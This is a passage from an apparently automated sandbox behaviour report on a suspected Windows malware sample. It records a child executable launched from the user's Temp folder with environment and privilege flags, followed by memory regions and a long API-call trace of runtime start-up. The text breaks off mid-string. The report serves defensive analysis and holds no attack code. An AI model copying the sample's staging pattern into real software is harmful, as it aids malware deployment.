[68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0108.238] ResumeThread (hThread=0x48) returned 0x1 [0108.238] CloseHandle (hObject=0x48) returned 1 [0108.238] CloseHandle (hObject=0x4c) returned 1 [0108.238] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.238] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0108.238] ExitProcess (uExitCode=0x0) Process: id = "32" image_name = "f8a3iwa6.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe" page_root = "0x7ea16760" os_pid = "0xcac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0xc8c" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4908 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4909 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4910 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 4911 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "f8a3iwa6.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe") Region: id = 4912 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4913 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4914 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4915 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 4916 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 4917 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4918 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4919 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4920 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 4921 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4922 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4923 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4924 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4925 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4926 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4927 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4928 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 4929 start_va = 0x2c0000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 4930 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4931 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5004 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5005 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 5006 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 5007 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 5008 start_va = 0x11a0000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 5131 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 5132 start_va = 0x12d0000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 5277 start_va = 0x11a0000 end_va = 0x127efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 5278 start_va = 0x12c0000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 5279 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 5280 start_va = 0x390000 end_va = 0x392fff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 5281 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Thread: id = 50 os_tid = 0xcb0 [0108.144] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x7e768c00, dwHighDateTime=0x1d440a9)) [0108.144] GetCurrentProcessId () returned 0xcac [0108.144] GetCurrentThreadId () returned 0xcb0 [0108.144] GetTickCount () returned 0x25e06 [0108.144] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=16493315259) returned 1 [0108.144] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0108.144] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0108.145] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0108.145] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0108.145] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0108.145] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0108.145] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0108.146] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0108.146] GetCurrentThreadId () returned 0xcb0 [0108.146] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x12c07d0)) [0108.147] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0108.147] GetFileType (hFile=0x3) returned 0x0 [0108.147] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0108.147] GetFileType (hFile=0x7) returned 0x0 [0108.147] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0108.147] GetFileType (hFile=0xb) returned 0x0 [0108.147] SetHandleCount (uNumber=0x20) returned 0x20 [0108.147] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.147] GetEnvironmentStringsW () returned 0x1cfcf8* [0108.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0108.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x12c11f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0108.147] FreeEnvironmentStringsW (penv=0x1cfcf8) returned 1 [0108.147] GetLastError () returned 0x6 [0108.147] SetLastError (dwErrCode=0x6) [0108.147] GetLastError () returned 0x6 [0108.147] SetLastError (dwErrCode=0x6) [0108.147] GetLastError () returned 0x6 [0108.147] SetLastError (dwErrCode=0x6) [0108.147] GetACP () returned 0x4e4 [0108.147] GetLastError () returned 0x6 [0108.147] SetLastError (dwErrCode=0x6) [0108.147] IsValidCodePage (CodePage=0x4e4) returned 1 [0108.147] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0108.147] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0108.148] GetLastError () returned 0x6 [0108.148] SetLastError (dwErrCode=0x6) [0108.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0108.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0108.148] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0108.148] GetLastError () returned 0x6 [0108.148] SetLastError (dwErrCode=0x6) [0108.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0108.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꧄ശAĀ") returned 256 [0108.148] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꧄ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0108.148] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꧄ശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0108.148] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x5